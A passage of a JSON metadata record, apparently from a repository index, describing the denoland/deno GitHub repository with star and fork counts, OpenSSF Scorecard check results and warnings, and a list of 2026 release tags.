TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-29T19:17:00.000Z","size":248743,"stargazers_count":108340,"open_issues_count":1540,"forks_count":6359,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-29T21:56:41.390Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-29T20:05:41.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36975782,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%